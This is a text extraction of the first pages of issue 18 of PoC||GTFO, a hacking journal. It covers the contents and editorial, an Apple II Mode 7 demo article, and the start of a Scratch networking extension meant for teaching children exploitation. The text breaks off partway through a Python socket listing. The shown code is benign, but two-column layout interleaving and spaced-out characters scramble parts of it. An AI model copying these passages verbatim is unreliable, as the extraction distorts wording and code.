Sei sulla pagina 1di 64

PoC GTFO

roof f
oncept or et
he uck
ut

Pastor Manul Laphroaig’s


Montessori Soldering School and
Stack Smashing Academy
for Youngsters Gifted and Not

nc ept
Co
f or
Proof o

G TF O
Са ми
зд ат

o
00
F

un 56
ded 8
13679

Рукописи не горят. pocorgtfo18.pdf. Compiled on June 23, 2018.


Application Fee: 0, $0 USD, $0 AUD, 0 RSD, 0 SEK, $50 CAD, 6 × 1029 Pengő (3 × 108 Adópengő), 100 JPC.
18:02 An 8 Kilobyte Mode 7 Demo for the Apple II . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p. 4
18:03 Fun Memory Corruption Exploits for Kids with Scratch! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p. 10
18:04 Concealing ZIP Files in NES Cartridges . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p. 17
18:05 House of Fun; or, Heap Exploitation against GlibC in 2018 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p. 22
18:06 Read Only Relocations for Static ELF . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p. 37
18:07 Remotely Exploiting a TetriNET Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p. 48
18:08 A Guide to KLEE LLVM Execution Engine Internals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p. 51
18:09 Reversing the Sandy Bridge DDR3 Scrambler with Coreboot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p. 58
18:10 Easy SHA-1 Colliding PDFs with PDFLaTeX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p. 63

Legal Note: Printing this to hardcopy prevents the electronic edition from smelling like burning paper.
We’ll be printing a few thousand of our own, but we also insist that you print it by laserjet or typewriter
самиздат, giving it away to friends and strangers. Sneak it into a food delivery rack at your local dive bar,
or hide it between two books on the shelves of your university library.

Reprints: Bitrot will burn libraries with merciless indignity that even Pets Dot Com didn’t deserve. Please
mirror—don’t merely link!—pocorgtfo18.pdf and our other issues far and wide, so our articles can help fight
the coming flame deluge. Not running one of our own, we like the following mirrors.

https://unpack.debug.su/pocorgtfo/ https://pocorgtfo.hacke.rs/
https://www.alchemistowl.org/pocorgtfo/ https://www.sultanik.com/pocorgtfo/

Technical Note: This file, pocorgtfo18.pdf, is valid as a PDF, ZIP, and HTML. It is available in two
different variants, but they have the same SHA-1 hash.

Printing Instructions: Pirate print runs of this journal are most welcome! PoCkGTFO is to be printed
duplex, then folded and stapled in the center. Print on A3 paper in Europe and Tabloid (11” x 17”) paper
in Samland, then fold to get a booklet in A4 or Letter size. Secret volcano labs in Canada may use P3
(280 mm x 430 mm) if they like, folded to make P4. The outermost sheet should be on thicker paper to
form a cover.
# This is how to convert an issue for duplex printing.
sudo apt-get install pdfjam
pdfbook --short-edge --vanilla --paper a3paper pocorgtfo18.pdf -o pocorgtfo18-book.pdf

Man of The Book Manul Laphroaig


Editor of Last Resort Melilot
TEXnician Evan Sultanik
Editorial Whipping Boy Jacob Torrey
Funky File Supervisor Ange Albertini
Assistant Scenic Designer Philippe Teuwen
Scooby Bus Driver Ryan Speers
with the good assistance of
Virtual Machine Mechanic Dan Kaminsky

2
18:01 I thought I turned it on, but I didn’t.
Neighbors, please join me in reading this nine- Vi Grey was reading PoCkGTFO 14:12, and a
teenth release of the International Journal of Proof nifty thought occurred. Why not merge a ZIP file
of Concept or Get the Fuck Out, a friendly little into an NES cartridge itself, and not just its iNES
collection of articles for ladies and gentlemen of dis- emulator file? See page 17 for all the practical de-
tinguished ability and taste in the field of reverse tails.
engineering and the study of weird machines. This If you enjoyed Yannay Livneh’s article on the
release is a gift to our fine neighbors in Montréal. VLC heap from PoCkGTFO 16:6, turn to page 22
If you are missing the first eighteen issues, we for his notes on the House of Fun, exploiting glibc
suggest asking a neighbor who picked up a copy of heaps in the year 2018.
the first in Vegas, the second in São Paulo, the third Ryan O’Neill, whom you might know as Elfmas-
in Hamburg, the fourth in Heidelberg, the fifth in ter, has been playing around with static linking of
Montréal, the sixth in Las Vegas, the seventh from ELF files on Linux. You certainly know that static
his parents’ inkjet printer during the Thanksgiv- files are handy for avoiding missing libraries, but
ing holiday, the eighth in Heidelberg, the ninth in did you know that static linking breaks ASLR and
Montréal, the tenth in Novi Sad or Stockholm, the RELRO defenses, that the global offset table might
eleventh in Washington D.C., the twelfth in Heidel- still be writable? See page 37 for his notes on pro-
berg, the thirteenth in Montréal, the fourteenth in ducing a static executable that does include these
São Paulo, San Diego, or Budapest, the fifteenth defenses.
in Canberra, Heidelberg, or Miami, the sixteenth TetriNET is a multiplayer clone of Tetris that
release in Montréal, New York, or Las Vegas, the St0rmCat released in 1997. On page 48, John Laky
seventeenth release in São Paulo or Budapest, or and Kyle Hanslovan give us a remote code execution
the eighteenth release in Leipzig or Washington, exploit for that game just twenty years too late for
D.C. Two collected volumes are available through anyone to expect a patch.
No Starch Press, wherever fine books are sold. When performing a cold boot attack, it’s impor-
tant to recover not just the contents of memory but
After our paper release, and only when quality
also to descramble it, and this scrambler is often
control has been passed, we will make an electronic
poorly documented on modern systems. On page
release named pocorgtfo18.pdf. It is a valid PDF
58, Nico Heijningen patches Coreboot to reverse en-
document, HTML website, and ZIP archive filled
gineer the scrambler of the DDR3 controller on In-
with fancy papers and source code. You will find it
tel’s Sandy Bridge processors.
available in two different variants, but they have the
Ange Albertini was one of the fine authors of
same SHA-1 hash.
the SHAttered attack that demonstrated a practi-
Nintendo’s SNES platform was famous for its cal SHA-1 collision. On page 63, he shows how to
Mode 7, a video mode in which a background im- reuse that same colliding block to substitute an arbi-
age could be rotated and stretched to create a faux trary image in a larger document, conveniently gen-
3D effect. This didn’t exist for the Apple ][, so on erated by PDFLATEX. As is the tradition in most
page 4 Vincent Weaver describes his recreation of of Ange’s articles, pocorgtfo18.pdf uses this tech-
the technique in software as a recent demo coding nique to place a stamp on the front cover. We’ll re-
exercise. lease two variants, but because they have the same
Many of us began our careers in reverse engineer- SHA-1 hash, we politely ask mirrors to include the
ing through line numbered BASIC, and we fondly MD5 hashes as well.
remember the peek and poke commands that let On page 64, the last page, we pass around the
us do sophisticated things with a child’s language. collection plate. Our church has no interest in bit-
On page 10, Kev Sheldrake extends the Scratch lan- coins or wooden nickels, but we’d love your donation
guage so that his son can experiment with memory of a reverse engineering story. Please send some our
corruption exploits. way.

3
18:02 An 8 Kilobyte Mode 7 Demo for the Apple II
by Vincent M. Weaver

While making an inside-joke filled game for my chips. Each sound chip provides three channels of
favorite machine, the Apple ][, I needed to cre- square waves as well as noise and envelope effects.
ate a Final-Fantasy-esque flying-over-the-planet se- Graphics:
quence. I was originally going to fake this, but why It is hard to imagine now, but the Apple ][ had
fake graphics when you can laboriously spend weeks nice graphics for its time. Compared to later com-
implementing the effect for real. It turns out the Ap- petitors, however, it had some limitations: No hard-
ple ][ is just barely capable of generating the effect ware sprites, user-defined character sets, blanking
in real time. interrupts, palette selection, hardware scrolling, or
Once I got the code working I realized it would be even a linear framebuffer! It did have hardware page
great as part of a graphical demo, so off on that tan- flipping, at least.
gent I went. This turned out well, despite the fact The hi-res graphics mode is a complex mess
that all I knew about the demoscene I had learned of NTSC hacks by Woz. You get approximately
from a few viewings of the Future Crew Second Re- 280x192 resolution, with 6 colors available. The col-
ality demo combined with dimly remembered Com- ors are NTSC artifacts with limitations on which
modore 64 and Amiga usenet flamewars. colors can be next to each other, in blocks of 3.5
While I hope you enjoy the description of the pixels. There is plenty of fringing on edges, and col-
demo and the work that went into it, I suspect ors change depending on whether they are drawn
this whole enterprise is primarily of note due to the at odd or even locations. To add to the madness,
dearth of demos for the Apple ][ platform. For those the framebuffer is interleaved in a complex way, and
of you who would like to see a truly impressive Ap- pixels are drawn least-significant-bit first. (All of
ple ][ demo, I would like to make a shout out to this to make DRAM refresh better and to shave a
FrenchTouch whose works put this one to shame. few 7400 series logic chips from the design.) You
do get two pages of graphics, Page 1 is at $2000
The Hardware and Page 2 at $4000.1 Optionally four lines of text
can be shown at the bottom of the screen instead of
CPU, RAM and Storage: graphics.
The Apple ][ was introduced in 1977 with a 6502 The lo-res mode is a bit easier to use. It pro-
processor running at roughly 1.023MHz. Early mod- vides 40 × 48 blocks, reusing the same memory as
els only shipped with 4k of RAM, but in later years, the 40×24 text mode. (As with hi-res you can switch
48k, 64k and 128k systems became common. While to a 40 × 40 mode with four lines of text displayed
the demo itself fits in 8k, it decompresses to a larger at the bottom.) Fifteen unique colors are available,
size and uses a full 48k of RAM; this would have plus a second shade of grey. Again the addresses are
been very expensive in the seventies. interleaved in a non-linear fashion. Lo-res Page 1 is
In 1977 you would probably be loading this from at $400 and Page 2 is at $800.
cassette tape, as it would be another year before Some amazing effects can be achieved by cycle
Woz’s single-sided 5 14 ” Disk II came around. With counting, reading the floating bus, and racing the
the release of Apple DOS3.3 in 1980, it offered 140k beam while toggling graphics modes on the fly.
of storage on each side.
Sound:
The only sound available in a stock Apple ][ is
a bit-banged speaker. There is no timer interrupt;
if you want music, you have to cycle-count via the
CPU to get the waveforms you needed.
The demo uses a Mockingboard soundcard, first
introduced in 1981. This board contains dual AY-3-
8910 sound generation chips connected via 6522 I/O
1 On 6502 systems hexadecimal values are traditionally indicated by a dollar sign.

4
Development Toolchain
I do all of my coding under Linux, using the ca65
assembler from the cc65 project. I cross-compile the
code, constructing AppleDOS 3.3 disk images using
custom tools I have written. I test first in emula-
tion, where AppleWin under Wine is the easiest to
use, but until recently MESS/MAME had cleaner
sound.
Once the code appears to work, I put it on a
USB stick and transfer to actual hardware using a
CFFA3000 disk emulator installed in an Apple IIe
platinum edition.
Figure 1. Colorful View of Executable Code
Bootloader
An Applesoft BASIC “HELLO” program loads the
binary automatically at bootup. This does not
count towards the executable size, as you could man-
ually BRUN the 8k machine-language program if
you wanted.
To make the loading time slightly more interest-
ing the HELLO program enables graphics mode and
loads the program to address $2000 (hi-res page1).
This causes the display to filled with the color-
ful pattern corresponding to the compressed image.
------------- $ffff (Figure 1.) This conveniently fills all 8k of the dis-
| ROM/IO | play RAM, or would have if we had poked the right
------------- $c000
| | soft-switch to turn off the bottom four lines of text.
| Uncompressed| After loading, execution starts at address $2000.
| Code/Data |
| |
------------- $4000
| Compressed |
| Code | Decompression
------------- $2000
| free | The binary is encoded with the LZ4 algorithm. We
------------- $1c00
| Scroll | flip to hi-res Page 2 and decompress to this region
| Data | so the display now shows the executable code.
------------- $1800
| Multiply | The 6502 size-optimized LZ4 decompression
| Tables
-------------
|
$1000
code was written by qkumba (Peter Ferrie).2 The
| LORES pg 3 | program and data decompress to around 22k start-
------------- $0c00 ing at $4000. This overwrites parts of DOS3.3, but
| LORES pg 2 |
------------- $0800 since we are done with the disk this is no problem.
| LORES pg 1 |
------------- $0400 If you look carefully at the upper left corner of
|free/vectors | the screen during decompression you will see my tri-
------------- $0200
| stack | angular logo, which is supposed to evoke my VMW
------------- $0100 initials. To do this I had to put the proper bit pat-
| zero pg |
------------- $0000 tern inside the code at the interleaved addresses of
$4000, $4400, $4800, and $4C00. The image data
at $4000 maps to (mostly) harmless code so it is left
Figure 2. Memory Map in place and executed.
2 http://pferrie.host22.com/misc/appleii.htm

5
mode. There are “holes” in the address range that
are not displayed, and various pieces of hardware
can use these as scratchpad memory. This means
just overwriting the whole 1k with data might not
work out well unless you know what you are doing.
Our RLE decompression code skips the holes just to
be safe.
SCROLL TEXT: The title screen has scrolling
text at the bottom. This is nothing fancy, the text
is in a buffer off screen and a 40 × 4 chunk of RAM
is copied in every so many cycles.
You might notice that there is tearing/jitter in
the scrolling even though we are double-buffering
the graphics. Sadly there is no reliable cross-
Figure 3. The title screen. platform way to get the VBLANK info on Apple
][ machines, especially the older models.
Optimizing the code inside of a compressed im-
age (to fit in 8k) is much more complicated than reg- Mockingbird Music
ular size optimization. Removing instructions some-
times makes the binary larger as it no longer com- No demo is complete without some exciting back-
presses as well. Long runs of a single value, such as ground music. I like chiptune music, especially the
zero padding, are essentially free. This became an kind written for AY-3-8910 based systems. During
exercise of repeatedly guessing and checking, until the long wait for my Mockingboard hardware to ar-
everything fit. rive, I designed and built a Raspberry Pi chiptune
player that uses essentially the same hardware. This
allowed me to build up some expertise with the soft-
Title Screen ware/hardware interface in advance.
Once decompression is done, execution continues at The song being played is a stripped down and
address $4000. We switch to low-res mode for the re-arranged version of “Electric Wave” from CC’00
rest of the demo. by EA (Ilya Abrosimov).
Most of my sound infrastructure involves YM5
FADE EFFECT: The title screen fades in from files, a format commonly used by ZX Spectrum and
black, which is a software hack as the Apple ][ does Atari ST users. The YM file format is just AY-3-
not have palette support. This is done by loading 8910 register dumps taken at 50Hz. To play these
the image to an off-screen buffer and then a lookup back one sets up the sound card to interrupt 50 times
table is used to copy in the faded versions to the a second and then writes out the fourteen register
image buffer on the fly. values from each frame in an interrupt handler.
TITLE GRAPHICS: The title screen is shown in Writing out the registers quickly enough is a
Figure 3. The image is run-length encoded (RLE) challenge on the Apple ][, as for each register you
which is probably unnecessary in light of it being have to do a handshake and then set both the reg-
further LZ4 encoded. (LZ4 compression was a late ister number and the value. It is hard to do this in
addition to this endeavor.) less than forty 1MHz cycles for each register. With
Why not save some space and just loading our complex chiptune files (especially those written on
demo at $400, negating the need to copy the im- an ST with much faster hardware), sometimes it is
age in place? Remember the graphics are 40 × 48 not possible to get exact playback due to the de-
(shared with the text display region). It might be lay. Further slowdown happens as you want to write
easier to think of it as 40 × 24 characters, with the both AY chips (the output is stereo, with one AY on
top / bottom nybbles of each ASCII character be- the left and one on the right). To help with latency
ing interpreted as colors for a half-height block. If on playback, we keep track of the last frame written
you do the math you will find this takes 960 bytes and only write to the registers that have changed.
of space, but the memory map reserves 1k for this The demo detects the Mockingboard in Slot 4

6
at startup. First the board is initialized, then one The leftmost position in the tile lookup is calculated:
of the 6522 timers is set to interrupt at 25Hz. Why 
25Hz and not 50Hz? At 50Hz with fourteen registers width 
tilex = x + d cos(angle) − ∆x
you use 700 bytes/s. So a two minute song would 2
take 84k of RAM, which is much more than is avail-  width 
able! To allow the song to fit in memory, without a tiley = y + d sin(angle) − ∆y
fancy circular buffer decompression routine, we have 2
to reduce the size.3 Then an inner loop happens that adds ∆x and ∆y as
First the music is changed so it only needs to be we lookup the color from the tilemap (just a wrap-
updated at 25Hz, and then the register data is com- around array lookup) for each block on the line.
pressed from fourteen bytes to eleven bytes by strip-
ping off the envelope effects and packing together color = tilelookup(tilex, tiley)
fields that have unused bits. In the end the sound
quality suffered a bit, but we were able to fit an ac- plot(x, y)
ceptably catchy chiptune inside of our 8k payload.
tilex += ∆x, tiley += ∆y

Drawing the Mode7 Background Optimizations: The 6502 processor cannot do


floating point, so all of our routines use 8.8 fixed
Mode 7 is a Super Nintendo (SNES) graphics mode
point math. We eliminate all use of division, and
that takes a tiled background and transforms it
convert as much as possible to table lookups, which
by rotating and scaling. The most common effect
involves limiting the heights and angles a bit.
squashes the background out to the horizon, giv-
Some cycles are also saved by using self-
ing a three-dimensional look. The SNES did these
modifying code, most notably hard-coding the
transforms in hardware, but our demo must do them
height (z) value and modifying the code whenever
in software.
this is changed. The code started out only capable
Our algorithm is based on code by Martijn van
of roughly 4.9fps in 40 × 20 resolution and in the
Iersel which iterates through each horizontal line on
end we improved this to 5.7fps in 40 × 40 resolution.
the screen and calculates the color to output based
Care was taken to optimize the innermost loop, as
on the camera height (spacez) and angle as well as
every cycle saved there results in 1280 cycles saved
the current coordinates, x and y.
overall.
First, the distance d is calculated based on fixed
scale and distance-to-horizon factors. Instead of a Fast Multiply: One of the biggest bottlenecks in
costly division operation, we use a pre-generated the mode7 code was the multiply. Even our opti-
lookup table for this. mized algorithm calls for at least seven 16-bit by
16-bit to 32-bit multiplies, something that is really
z × yscale slow on the 6502. A typical implementation takes
d=
y + horizon around 700 cycles for an 8.8 × 8.8 fixed point multi-
ply.
Next we calculate the horizontal scale (distance be- We improved this by using the ancient quarter-
tween points on this line): square multiply algorithm, first described for 6502
use by Stephen Judd.
d
h= This works by noting these factorizations:
xscale
Then we calculate delta x and delta y values between (a + b)2 = a2 + 2ab + b2
each block on the line. We use a pre-computed sine/-
cosine lookup table. (a − b)2 = a2 − 2ab + b2
If you subtract these you can simplify to
∆x = − sin(angle) × h
(a + b)2 (a − b)2
∆y = cos(angle) × h a×b= −
4 4
3 For an example of such a routine, see my Chiptune music-disk demo.

7
were reduced to the proper size and color limita-
tions. The shadows are also sprites, and as the Ap-
ple ][ has no dedicated sprite hardware, these are
drawn completely in software.
The clicking noise on bounce is generated by ac-
cessing the speaker port at address $C030. This
gives some sound for those viewing the demo with-
out the benefit of a Mockingboard.

TFV SPACESHIP FLYING


This next scene has a spaceship flying over an is-
land. The Mode7 graphics code is generic enough
that only one copy of the code is needed to generate
Figure 4. Bouncing ball on infinite checkerboard. both the checkerboard and island scenes. The space-
ship, water splash, and shadows are all sprites. The
path the ship takes is pre-recorded; this is adapted
from the Talbot Fantasy 7 game engine with the
keyboard code replaced by a hard-coded script of
actions to take.

Figure 5. Spaceship flying over an island.

For 8-bit values if you create a table of squares


from 0 to 511, then you can convert a multiply
into two table lookups and a subtraction.4 This
does have the downside of requiring two kilobytes
of lookup tables, but it reduces the multiply cost to
the order of 250 cycles or so and these tables can be
generated at startup.

BALL ON CHECKERBOARD
The first Mode7 scene transpires on an infinite
checkerboard. A demo would be incomplete with-
out some sort of bouncing geometric solid, in this
case we have a pink sphere. The sphere is repre-
sented by sixteen sprites that were captured from
a twenty year old OpenGL example. Screenshots
4 All 8-bit a + b and a − b fall in this range.

8
The star positions require random number gener-
ation, but there is no easy way to quickly get random
data on the Apple ][. Originally we had a 256-byte
blob of pre-generated “random” values included in
the code. This wasted space, so instead we use our
own machine code at address at $5000 as if it were
a block of random numbers!
A simple state machine controls star speed, ship
movement, hyperspace, background color (for the
blue flash) and the eventual sequence of sprites as
the ship vanishes into the distance.

RASTERBARS/CREDITS
Figure 6. Spaceship with starfield. Once the ship has departed, it is time to run the
credits as the stars continue to fly by.
The text is written to the bottom four lines of the
screen, seemingly surrounded by graphics blocks.
Mixed graphics/text is generally not be possible on
the Apple ][, although with careful cycle counting
and mode switching groups such as FrenchTouch
have achieved this effect. What we see in this demo
is the use of inverse-mode (inverted color) space
characters which appear the same as white graphics
blocks.
The rasterbar effect is not really rasterbars, just
a colorful assortment of horizontal lines drawn at a
location determined with a sine lookup table. Hori-
zontal lines can take a surprising amount of time to
draw, but these were optimized using inlining and a
few other tricks.
The spinning text is done by just rapidly rotating
Figure 7. Rasterbars, stars, and credits.
the output string through the ASCII table, with the
clicking effect again generated by hitting the speaker
STARFIELD at address $C030. The list of people to thank ended
up being the primary limitation to fitting in 8kB, as
The spaceship now takes to the stars. This is typical unique text strings do not compress well. I apologize
starfield code, where on each iteration the x and y to everyone whose moniker got compressed beyond
values are changed by recognition, and I am still not totally happy with
x y the centering of the text.
∆x = , ∆y =
z z
In order to get a good frame rate and not clutter A Parting Gift
the lo-res screen only sixteen stars are modeled. To
avoid having to divide, the reciprocal of all possible Further details, a prebuilt disk image, and full
z values are stored in a table, and the fast-multiply source code are available both online and attached
routine described previously is used. to the electronic version of this document.5 6

5 unzip pocorgtfo18.pdf mode7.tar.gz


6 http://www.deater.net/weave/vmwprod/mode7_demo/

9
18:03 Fun Memory Corruption Exploits for Kids with Scratch!
by Kev Sheldrake

Introduction
When my son graduated from Scratch Junior on the
iPad to full-blown Scratch on a desktop computer, I
opted to protect the Internet from him by not giving
him a network interface. Instead I installed the of-
fline version of Scratch on his computer that works
completely stand-alone. One of the interesting dif-
ferences between the online and offline versions of
Scratch is the way in which it can be extended; the
offline version will happily provide an option to in-
stall an ‘Experimental HTTP Extension’ if you use All code lives behind sprites or the stage (back-
the super-secret ‘shift click’ on the File menu instead ground); it can sense key presses, mouse clicks,
of the regular, common-all-garden ‘click’. sprites touching, etc, and can move sprites and
These extensions allow Scratch to communicate change their size, colour, etc. If you ever wanted
with another process outside the sandbox through a to recreate that crappy flash game you played in
web service; there is an abandoned Python mod- the late 90s at university or in your first job then
ule that provides a suitable framework for build- Scratch is perfect for that. You could probably get
ing them. While words like ‘experimental’ and ‘a- something that looks suitably pro within an after-
bandoned’ don’t appear to offer much hope, this is noon or less. Don’t be fooled by the fact it was
all just a facade and the technology actually works made for kids, Scratch can make some pretty cool
pretty well. Indeed, we have interfaced Scratch to things and is fun; but also be aware that it has its
Midi, Arduino projects and, as this essay will ex- limitations, and lack of networking is one of them.
plain, TCP/IP network sockets because, well, if a The offline version of Scratch relies on Adobe Air
language exists to teach kids how to code then I which has been abandoned on Linux. An older 32-
think it [c|sh]ould also be used to teach them how bit version can be installed, but you’ll have much
to hack. better results if you just try this on Windows or
MacOS.

Scratch Basics
Scratch Extensions
If you’re not already aware, Scratch is an IDE and a
language, all wrapped up in a sandbox built out of Extensions were introduced in Scratch v2.0 and dif-
Squeak/Smalltalk (v1.0 to v1.4), Flash/Adobe Air fer between the online and offline versions. For the
(v2.0) and HTML5/Javascript (v3.0). Within it, online version extensions are coded in JS, stored on
sprite-based programs can be written using prim- github.io and accessed via the ScratchX version of
itives that resemble jigsaw pieces that constrain Scratch. As I had limited my son to the offline ver-
where or how they can be placed. For example, an sion, we were treated to web service extensions built
IF/THEN primitive requires a predicate operator, in Python.
such as X=Y or X>Y; in Scratch, predicates have On the face of it a web service seems like an obvi-
angled edges and only fit in places where predicates ous choice because they are easy to build, are asyn-
are accepted. This makes it easier for children to chronous by nature and each method can take multi-
learn how to combine primitives to make statements ple arguments. In reality, this extension model was
and eventually programs. actually designed for controlling things like robot
arms rather than anything generic. There are com-
mands and reporters, each represented in Scratch
as appropriate blocks; commands would move robot
motors and reporters would indicate when motor
limits are hit. To put these concepts into more stan-
dard terms, commands are essentially procedures.

10
They take arguments but provide no responses, and
reporters are essentially global variables that can be
affected by the procedures. If you think this is a
weird model to program in then you’d be correct.
In order to quickly and easily build a suitable
web service, we can use the off-the-shelf abandon-
ware, Blockext.7 This is a python module that pro-
vides the full web service functionality to an object
that we supply. It’s relatively trivial to build meth-
ods that create sockets, write to sockets, and close
sockets, as we can get away without return values.
To implement methods that read from sockets we
need to build a command (procedure) that does the
actual read, but puts the data into a global variable
that can be read via a reporter.
At this point it is worth discussing how these re-
porters / global variables actually function. They
are exposed via the web service by simply report-
ing their values thirty times a second. That’s right,
thirty times a second. This makes them great for
motor limit switches where data is minimal but la-
tency is critical, but less great at returning data
from sockets. Still, as my hacky extension shows,
if their use is limited they can still work. The block-
ext console doesn’t log reporter accesses but a web
proxy can show them happening if you’re interested
in seeing them.
7 git clone https://github.com/blockext/blockext

11
Scratch Limitations
While Scratch can handle binary data, it doesn’t re-
ally have a way to input it, and certainly no C-style
or pythonesque formatting. It also has no complex
data types; variables can be numbers or strings, but
the language is probably Turing-complete so this
shouldn’t really stop us. There is also no random
access into strings or any form of string slicing; we
can however retrieve a single letter from a string by
position.
Strings can be constructed from a series of joins,
and we can write a python handler to convert from
an ASCIIfied format (such as ‘\xNN’) to regular bi-
nary. Stripping off newlines on returned strings re-
quires us to build a new (native) Scratch block. Just
like the python blocks accessible through the web
service, these blocks are also procedures with no re-
turn values. We are therefore constrained to return-
ing values via (sprite) global variables, which means
we have to be careful about concurrency.
Talking of concurrency, Scratch has a handy
message system that can be used to create paral-
lel processing. As highlighted, however, the lack of
functions and local variables means we can easily
run into problems if we’re not careful.

Blockext
The Python blockext module can be obtained from
its GitHub and installed with a simple sudo python
setup.py install.
My socket extension is quite straight forward.
The definition of the object is mostly standard
socket code; while it has worked in my limited test-
ing, feel free to make it more robust for any produc-
tion use—this is just a PoC after all.

12
1 #! / u s r / b i n / p y t h o n

3 from b l o c k e x t import ∗
import s o c k e t
5 import s e l e c t
import u r l l i b
7 import b a s e 6 4

9 class SSocket :
d e f __init__ ( s e l f ) :
11 s e l f . s o c k e t s = {}

13 def _on_reset ( s e l f ) :
print ’ r e s e t ! ! ! ’
15 f o r key in s e l f . s o c k e t s . k e y s ( ) :
i f s e l f . s o c k e t s [ key ] [ ’ s o c k e t ’ ] :
17 s e l f . s o c k e t s [ key ] [ ’ s o c k e t ’ ] . c l o s e ( )
s e l f . s o c k e t s = {}
19
def a d d _ s o c k e t ( s e l f , type , p r o t o , s o c k , h o s t , p o r t ) :
21 i f s e l f . i s _ c o n n e c t e d ( s o c k ) or s e l f . i s _ l i s t e n i n g ( s o c k ) :
print ’ add_socket : s o c k e t a l r e a d y i n use ’
23 return
s e l f . s o c k e t s [ s o c k ] = { ’ t y p e ’ : type , ’ p r o t o ’ : p r o t o , ’ h o s t ’ : host , ’ port ’ : port , ’ reading ’ : 0, ’ closed ’ : 0}
25
def s e t _ s o c k e t ( s e l f , sock , s ) :
27 i f not s e l f . i s _ c o n n e c t e d ( s o c k ) and not s e l f . i s _ l i s t e n i n g ( sock ) :
print ’ set_socket : s o c k e t doesn \ ’ t exist ’
29 return
s e l f . sockets [ sock ] [ ’ socket ’ ] = s
31
def s e t _ c o n t r o l ( s e l f , sock , c ) :
33 i f not s e l f . i s _ c o n n e c t e d ( s o c k ) and not s e l f . i s _ l i s t e n i n g ( s o c k ) :
print ’ s e t _ c o n t r o l : s o c k e t doesn \ ’ t e x i s t ’
35 return
s e l f . sockets [ sock ] [ ’ c o n t r o l ’ ] = c
37
def set_addr ( s e l f , sock , a ) :
39 i f not s e l f . i s _ c o n n e c t e d ( s o c k ) and not s e l f . i s _ l i s t e n i n g ( s o c k ) :
print ’ set_addr : s o c k e t doesn \ ’ t e x i s t ’
41 return
s e l f . s o c k e t s [ s o c k ] [ ’ addr ’ ] = a
43
def c r e a t e _ s o c k e t ( s e l f , proto , sock , host , port ) :
45 i f s e l f . i s _ c o n n e c t e d ( s o c k ) or s e l f . i s _ l i s t e n i n g ( s o c k ) :
print ’ c r e a t e _ s o c k e t : s o c k e t a l r e a d y in use ’
47 return
s = s o c k e t . s o c k e t ( s o c k e t . AF_INET, s o c k e t .SOCK_STREAM)
49 s . connect ( ( host , port ) )
s e l f . add_socket ( ’ s o c k e t ’ , proto , sock , host , p o r t )
51 s e l f . s e t _ s o c k e t ( sock , s )

53 def c r e a t e _ l i s t e n e r ( s e l f , proto , sock , ip , port ) :


i f s e l f . i s _ c o n n e c t e d ( s o c k ) or s e l f . i s _ l i s t e n i n g ( s o c k ) :
55 print ’ c r e a t e _ l i s t e n e r : s o c k e t a l r e a d y in use ’
return
57 s = socket . socket ()
s . bind ( ( ip , port ) )
59 s . l i s t e n (5)
s e l f . add_socket ( ’ l i s t e n e r ’ , proto , sock , ip , p o r t )
61 s e l f . s e t _ c o n t r o l ( sock , s )

63 def accept_connection ( s e l f , sock ) :


i f not s e l f . i s _ l i s t e n i n g ( s o c k ) :
65 print ’ accept_connection : s o c k e t is not listening ’
return
67 s = s e l f . sockets [ sock ] [ ’ c o n t r o l ’ ]
c , addr = s . a c c e p t ( )
69 s e l f . s e t _ s o c k e t ( sock , c )
s e l f . set_addr ( sock , addr )
71
def close_socket ( s e l f , sock ) :
73 i f s e l f . i s _ c o n n e c t e d ( s o c k ) or s e l f . i s _ l i s t e n i n g ( s o c k ) :
s e l f . sockets [ sock ] [ ’ socket ’ ] . c l o s e ()
75 del s e l f . s o c k e t s [ sock ]

77 def is_connected ( s e l f , sock ) :


i f sock in s e l f . s o c k e t s :
79 i f s e l f . s o c k e t s [ s o c k ] [ ’ t y p e ’ ] == ’ s o c k e t ’ and not s e l f . sockets [ sock ] [ ’ c l o s e d ’ ] :
return True
81 return F a l s e

83 def i s _ l i s t e n i n g ( s e l f , sock ) :
i f sock in s e l f . s o c k e t s :
85 i f s e l f . s o c k e t s [ s o c k ] [ ’ t y p e ’ ] == ’ l i s t e n e r ’ :
return True
87 return F a l s e

89 def w r i t e _ s o c k e t ( s e l f , d a t a , type , s o c k ) :
i f not s e l f . i s _ c o n n e c t e d ( s o c k ) and not s e l f . i s _ l i s t e n i n g ( s o c k ) :
91 print ’ write_socket : s o c k e t doesn \ ’ t e x i s t ’
return
93 i f not ’ s o c k e t ’ i n s e l f . s o c k e t s [ s o c k ] or s e l f . s o c k e t s [ s o c k ] [ ’ c l o s e d ’ ] :
print ’ write_socket : s o c k e t fd doesn \ ’ t e x i s t ’
95 return
buf = ’ ’
97 i f type == " raw " :
buf = data
99 e l i f type == " c e n c " :
buf = data . decode ( ’ s t r i n g _ e s c a p e ’ )
101 e l i f type == " u r l e n c " :
buf = u r l l i b . unquote ( data )

13
103 elif type == " b a s e 6 4 " :
buf = base64 . b64decode ( data )
105
totalsent = 0
107 while t o t a l s e n t < len ( buf ) :
s e n t = s e l f . s o c k e t s [ sock ] [ ’ s o c k e t ’ ] . send ( buf [ t o t a l s e n t : ] )
109 i f s e n t == 0 :
s e l f . sockets [ sock ] [ ’ c l o s e d ’ ] = 1
111 return
t o t a l s e n t += s e n t
113
def clear_read_flag ( s e l f , sock ) :
115 i f not s e l f . i s _ c o n n e c t e d ( s o c k ) and not s e l f . i s _ l i s t e n i n g ( s o c k ) :
print ’ r e a d l i n e _ s o c k e t : s o c k e t doesn \ ’ t e x i s t ’
117 return
i f not ’ s o c k e t ’ i n s e l f . s o c k e t s [ s o c k ] :
119 print ’ r e a d l i n e _ s o c k e t : s o c k e t fd doesn \ ’ t e x i s t ’
return
121 s e l f . sockets [ sock ] [ ’ reading ’ ] = 0

123 def reading ( s e l f , sock ) :


i f not s e l f . i s _ c o n n e c t e d ( s o c k ) and not s e l f . i s _ l i s t e n i n g ( s o c k ) :
125 return 0
